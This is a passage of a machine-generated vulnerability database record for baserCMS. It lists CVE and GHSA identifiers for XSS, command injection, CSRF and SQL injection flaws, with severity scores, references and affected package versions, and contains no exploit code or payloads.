scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
13
url VCID-d5gk-q2hh-kba5
vulnerability_id VCID-d5gk-q2hh-kba5
summary 
Cross-site Scripting
baserCMS `content_info.php`, `content_options.php`, `content_related.php`, `index_list_tree.php`, `jquery.bcTree.js`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-15154
reference_id
reference_type
scores
0
value 0.00784
scoring_system epss
scoring_elements 0.74124
published_at 2026-06-04T12:55:00Z
1
value 0.00784
scoring_system epss
scoring_elements 0.74157
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-15154
1
reference_url https://basercms.net/security/20200827
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/20200827
2
reference_url https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371
3
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2020-15154
reference_id CVE-2020-15154
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2020-15154
5
reference_url https://github.com/advisories/GHSA-cpxc-67rc-c775
reference_id GHSA-cpxc-67rc-c775
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cpxc-67rc-c775
fixed_packages
0
url pkg:composer/baserproject/basercms@4.3.7
purl pkg:composer/baserproject/basercms@4.3.7
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-eq7f-n3g5-s3hu
11
vulnerability VCID-g56w-z9cx-5ygv
12
vulnerability VCID-ggv8-3v9t-mfea
13
vulnerability VCID-hpk4-a6tr-3ffe
14
vulnerability VCID-j37y-gws9-ake9
15
vulnerability VCID-jby7-s5ez-dqb3
16
vulnerability VCID-k575-suuf-7bhf
17
vulnerability VCID-k5qv-4yp3-zbgf
18
vulnerability VCID-khft-xvrw-g3dr
19
vulnerability VCID-kmpp-6j49-pqfz
20
vulnerability VCID-mfm9-gsh3-ubg8
21
vulnerability VCID-nxrf-64er-xbfx
22
vulnerability VCID-p695-t9ye-v3ga
23
vulnerability VCID-pd8c-9d7z-zkhg
24
vulnerability VCID-sqr4-v889-tff8
25
vulnerability VCID-twf5-bzba-gqb4
26
vulnerability VCID-u16w-rbuk-ybfs
27
vulnerability VCID-uedz-j2vn-cbea
28
vulnerability VCID-wvnk-63hy-ykeq
29
vulnerability VCID-xpsb-2yux-g3cf
30
vulnerability VCID-xxud-7jsh-bbc1
31
vulnerability VCID-y2sz-c6vb-pkdp
32
vulnerability VCID-zqd4-rdem-jfgk
33
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.3.7
aliases CVE-2020-15154, GHSA-cpxc-67rc-c775
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d5gk-q2hh-kba5
14
url VCID-e4xa-jm9u-nked
vulnerability_id VCID-e4xa-jm9u-nked
summary 
OS Command Injection
baserCMS allows remote authenticated attackers to execute arbitrary OS commands via unspecified vectors.
references
0
reference_url http://jvn.jp/en/jp/JVN67881316/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN67881316/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-0569
reference_id
reference_type
scores
0
value 0.01
scoring_system epss
scoring_elements 0.77368
published_at 2026-06-05T12:55:00Z
1
value 0.01
scoring_system epss
scoring_elements 0.77339
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-0569
2
reference_url https://basercms.net/security/JVN67881316
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN67881316
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0569
reference_id CVE-2018-0569
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0569
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0569, GHSA-6j3p-vrph-j7qq
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-e4xa-jm9u-nked
15
url VCID-eq7f-n3g5-s3hu
vulnerability_id VCID-eq7f-n3g5-s3hu
summary 
Cross-site Scripting
Improper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
reference_id CVE-2021-20681
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20681, GHSA-24p5-x9f9-vvpx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu
16
url VCID-erav-4pk1-wfhc
vulnerability_id VCID-erav-4pk1-wfhc
summary 
Cross-Site Request Forgery (CSRF)
Cross-site request forgery (CSRF) vulnerability in the baserCMS Mail plugin allows remote attackers to hijack the authentication of administrators via unspecified vectors.
references
0
reference_url http://basercms.net/security/JVN92765814
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://basercms.net/security/JVN92765814
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2016-4879
reference_id
reference_type
scores
0
value 0.00121
scoring_system epss
scoring_elements 0.30744
published_at 2026-06-05T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30671
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2016-4879
2
reference_url https://jvn.jp/en/jp/JVN92765814/index.html
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN92765814/index.html
3
reference_url https://web.archive.org/web/20210308130052/http://www.securityfocus.com/bid/93217
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20210308130052/http://www.securityfocus.com/bid/93217
4
reference_url http://www.securityfocus.com/bid/93217
reference_id
reference_type
scores
url http://www.securityfocus.com/bid/93217
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2016-4879
reference_id CVE-2016-4879
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2016-4879
6
reference_url https://github.com/advisories/GHSA-397g-4jpj-44xg
reference_id GHSA-397g-4jpj-44xg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-397g-4jpj-44xg
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.10.1
purl pkg:composer/baserproject/basercms@3.0.10.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-ffq1-r9ck-1bhp
17
vulnerability VCID-g56w-z9cx-5ygv
18
vulnerability VCID-ga9u-uv9b-tydr
19
vulnerability VCID-ggv8-3v9t-mfea
20
vulnerability VCID-gsg3-fdmu-vqag
21
vulnerability VCID-guvm-x5jc-mfgc
22
vulnerability VCID-hpk4-a6tr-3ffe
23
vulnerability VCID-j37y-gws9-ake9
24
vulnerability VCID-jby7-s5ez-dqb3
25
vulnerability VCID-k575-suuf-7bhf
26
vulnerability VCID-k5qv-4yp3-zbgf
27
vulnerability VCID-khft-xvrw-g3dr
28
vulnerability VCID-kmpp-6j49-pqfz
29
vulnerability VCID-mfm9-gsh3-ubg8
30
vulnerability VCID-nxrf-64er-xbfx
31
vulnerability VCID-p695-t9ye-v3ga
32
vulnerability VCID-p6nr-eu91-53b4
33
vulnerability VCID-pd8c-9d7z-zkhg
34
vulnerability VCID-r4jc-22rq-d3cb
35
vulnerability VCID-sqr4-v889-tff8
36
vulnerability VCID-u16w-rbuk-ybfs
37
vulnerability VCID-uedz-j2vn-cbea
38
vulnerability VCID-vqx2-hzju-r7et
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-y2sz-c6vb-pkdp
41
vulnerability VCID-y9f3-k7xk-rucf
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.10.1
1
url pkg:composer/baserproject/basercms@3.0.11
purl pkg:composer/baserproject/basercms@3.0.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-ffq1-r9ck-1bhp
17
vulnerability VCID-g56w-z9cx-5ygv
18
vulnerability VCID-ga9u-uv9b-tydr
19
vulnerability VCID-ggv8-3v9t-mfea
20
vulnerability VCID-gsg3-fdmu-vqag
21
vulnerability VCID-guvm-x5jc-mfgc
22
vulnerability VCID-hpk4-a6tr-3ffe
23
vulnerability VCID-j37y-gws9-ake9
24
vulnerability VCID-jby7-s5ez-dqb3
25
vulnerability VCID-k575-suuf-7bhf
26
vulnerability VCID-k5qv-4yp3-zbgf
27
vulnerability VCID-khft-xvrw-g3dr
28
vulnerability VCID-kmpp-6j49-pqfz
29
vulnerability VCID-mfm9-gsh3-ubg8
30
vulnerability VCID-nxrf-64er-xbfx
31
vulnerability VCID-p695-t9ye-v3ga
32
vulnerability VCID-p6nr-eu91-53b4
33
vulnerability VCID-pd8c-9d7z-zkhg
34
vulnerability VCID-r4jc-22rq-d3cb
35
vulnerability VCID-sqr4-v889-tff8
36
vulnerability VCID-u16w-rbuk-ybfs
37
vulnerability VCID-uedz-j2vn-cbea
38
vulnerability VCID-vqx2-hzju-r7et
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-y2sz-c6vb-pkdp
41
vulnerability VCID-y9f3-k7xk-rucf
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.11
aliases CVE-2016-4879, GHSA-397g-4jpj-44xg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-erav-4pk1-wfhc
17
url VCID-ffq1-r9ck-1bhp
vulnerability_id VCID-ffq1-r9ck-1bhp
summary 
SQL Injection
Baser CMS contains a SQL injection vulnerability.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10842
reference_id
reference_type
scores
0
value 0.0067
scoring_system epss
scoring_elements 0.7178
published_at 2026-06-05T12:55:00Z
1
value 0.0067
scoring_system epss
scoring_elements 0.7174
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10842
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10842
reference_id CVE-2017-10842
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10842
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
